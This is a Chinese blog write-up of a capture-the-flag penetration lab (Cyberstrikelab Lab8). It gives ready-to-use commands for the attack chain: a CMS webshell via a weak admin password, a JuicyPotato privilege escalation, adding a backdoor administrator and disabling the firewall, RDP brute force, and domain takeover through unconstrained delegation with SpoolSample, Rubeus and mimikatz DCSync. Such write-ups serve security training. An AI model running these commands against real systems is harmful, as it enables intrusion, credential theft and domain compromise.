跳过正文
HYH’s Blog

Cyberstrikelab-Lab8

·108 字·1 分钟
Cyberstrikelab ZZZCMS RDP
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

ZZZMCS
#

直接访问80端口,进入/admin登录界面,使用弱密码admin/admin123456进入到后台

来到模板管理随便编辑一个html
如下图添加
成功写入木马
连接蚁剑,在根目录拿到flag1
不过当前并不是system权限,好像直接通过蚁剑传马会超时,这里我开的http服务来下载
目标主机上有杀软,直接生成的cs木马会被直接杀掉,这里我用这个插件

使用插件juicypotato模块提升至system权限
其中5985扫描是开放的,接下来dumphash
走winrm进行添加用户,开放RDP等 

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

远程登录后,刚好发现了360

查看到内网ip
使用stowaway添加代理

RDP Brute
#

fscan扫描结果如下

针对10.5.5.33进行全端口扫描,发现开放了3389
进行爆破登录,得到密码是admin@123456
这里有个前置条件,就是爆破RDP的时候,hydra似乎会走Kerberos认证,因此可能会出现以下错误
修改一下/etc/krb5.conf即可

[libdefaults]
  default_realm = CYBERSTRIKE.LAB
  dns_lookup_realm = false
  dns_lookup_kdc = false

[realms]
  CYBERSTRIKE.LAB = {
    kdc = 10.5.5.66
    admin_server = 10.5.5.66
  }

[domain_realm]
  .cyberstrike.lab = CYBERSTRIKE.LAB
  cyberstrike.lab = CYBERSTRIKE.LAB

登录后在根目录拿到flag2

上传cs的定向木马,连接上线

可以通过cs的中转上线,利用svc提权到system

非约束委派
#

查询当前域内的非约束委派用户

AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

也就是cyberweb用户是非约束委派,上传Rubeus监听来自域控的票据
利用打印机漏洞(SpoolSample)或类似攻击让域控主动连接非约束委派机器,从而生成并发送Kerberos票据给攻击者控制机器。

shell SpoolSample.exe DC CYBERWEB

用rubeus导入票据

shell Rubeus.exe ptt /ticket:<ticket>

mimikatz导出哈希

mimikatz.exe "lsadump::dcsync /domain:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit"

在根目录拿到flag3

Reply by Email